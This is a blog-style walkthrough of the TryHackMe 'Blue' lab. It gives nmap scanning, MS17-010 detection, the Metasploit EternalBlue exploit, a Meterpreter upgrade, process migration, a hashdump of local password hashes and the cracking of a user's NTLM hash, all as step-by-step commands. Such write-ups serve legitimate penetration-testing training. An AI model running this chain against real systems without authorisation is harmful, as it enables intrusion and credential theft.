TryHackMe Walkthrough : Blue


Hello guys, back again with a walkthrough. This time I am going to show you how I exploited Blue, a virtual machine on TryHackMe. I specifically chose this machine because it is a good start for people who want to become penetration testers.

  • There are 5 tasks to solve: Recon, Gain Access, Escalate, Cracking, Find flags!
  • The two important open ports on the machine are 139 and 445, and both carry SMB.
  • Port 139: SMB originally ran on top of NetBIOS on port 139. NetBIOS is an older session service that lets Windows computers on the same local network find and talk to each other.
  • Port 445: since Windows 2000, SMB runs directly over TCP on port 445, without NetBIOS, which lets it work across routed networks, including the internet.
  • The machine is vulnerable to MS17-010, the SMBv1 bug exploited by EternalBlue.

Let’s start with this machine.

The “blue” machine IP is 10.10.209.91

We are going to apply the usual penetration-testing methodology we have used before, starting with enumeration: learn as much about the machine as possible.

Enumeration

We start with an nmap scan to find the open ports and the services and versions behind them. -A enables version detection, OS fingerprinting, default scripts and traceroute (run it with sudo so the OS fingerprinting part works), -p- scans all 65535 TCP ports instead of the default top 1000, and -T4 speeds the scan up on a lab network.

nmap -T4 -A -p- 10.10.209.91

As we can see, ports 139 and 445 are open, which means SMB is exposed. Server Message Block (SMB) is an application-layer (layer 7) client-server protocol widely used for file, printer, serial port and named pipe sharing. Next, run nmap's vuln script category against the host; it includes smb-vuln-ms17-010, which checks whether the SMBv1 server has been patched.

nmap --script vuln 10.10.209.91 -vv

The scan reports the host as VULNERABLE to MS17-010, so let's research it.

MS17-010 is the Microsoft bulletin for a remote code execution flaw in the SMBv1 server. It is the bug exploited by the leaked EternalBlue exploit, and Metasploit ships a module for it.

Exploitation (EternalBlue)

Start Metasploit:

msfconsole

Inside msfconsole, use the search command to find the matching module.

search eternalblue

The result list shows exploit/windows/smb/ms17_010_eternalblue. Select it by its index in the list (it was 15 here, but the numbering depends on your Metasploit version, so the full module path is the more reliable way to select it), review the options, and point the module at the target.

use 15
show options
set rhosts 10.10.209.91
exploit

Success!!! One caveat: EternalBlue corrupts kernel memory, so it does not land on every attempt. If the target does not give you a shell the first time, wait for it to come back up and run exploit again.

The session we get back is a plain Windows command shell. Meterpreter is far more convenient for the next steps, so we upgrade the shell with the post/multi/manage/shell_to_meterpreter module: background the shell (Ctrl+Z, then answer y), load the module and point it at our session.

use post/multi/manage/shell_to_meterpreter
set session 1
exploit

This spawns a second session, this time a Meterpreter one. List the sessions and interact with it, then confirm our privilege level. EternalBlue runs in the kernel, so we should already be NT AUTHORITY\SYSTEM; getsystem is only a fallback if we are not. whoami is a Windows command, so drop into a shell to run it, then Ctrl+Z to return to the Meterpreter prompt.

sessions
sessions -i 2
getsystem
shell
whoami
ctrl + z (back to Meterpreter)

Even as SYSTEM it is worth migrating into a stable SYSTEM-owned process before dumping credentials. List the processes with ps and pick a PID; 780 was the one on this run, yours will differ.

ps
migrate 780
hashdump

Copy Jon's line out of the hashdump output. It is a pwdump-format record, user:RID:LM hash:NT hash:::, and the part we want is the NT (NTLM) hash.

Paste the NT hash into CrackStation, a lookup table of pre-computed hashes. NT hashes are unsalted MD4 over the UTF-16LE password, so a common password is found instantly.

Windows used to rely on LM hashing to store passwords but has since moved to NTLM. LM hashes are no longer stored by default, and the LM field in a modern dump, aad3b435b51404eeaad3b435b51404ee, is the well-known marker for an empty or disabled LM hash, so only the NT hash is worth cracking.

Looking at the hashdump above, we can break one of the entries down into its component parts:

User: Jon
RID: 1000
LM hash: aad3b435b51404eeaad3b435b51404ee
NT hash: ffb43f0de35be4d9917ac0cc8ad57f8d

We found it: CrackStation recognises the NT hash and returns Jon's plaintext password.

You can locate all the flags with a recursive dir search from a Windows command shell (from Meterpreter, run shell first). Run it from the root of C:\ so the whole drive is searched:

dir *flag*txt /s

You can view the contents of each flag with the Windows type command, replacing file.txt with the path dir printed:

type file.txt

Now that we've found the three flags, let's complete the task.

Hope you guys enjoyed this tutorial, let me know if you try this out. Follow me for more projects like this!
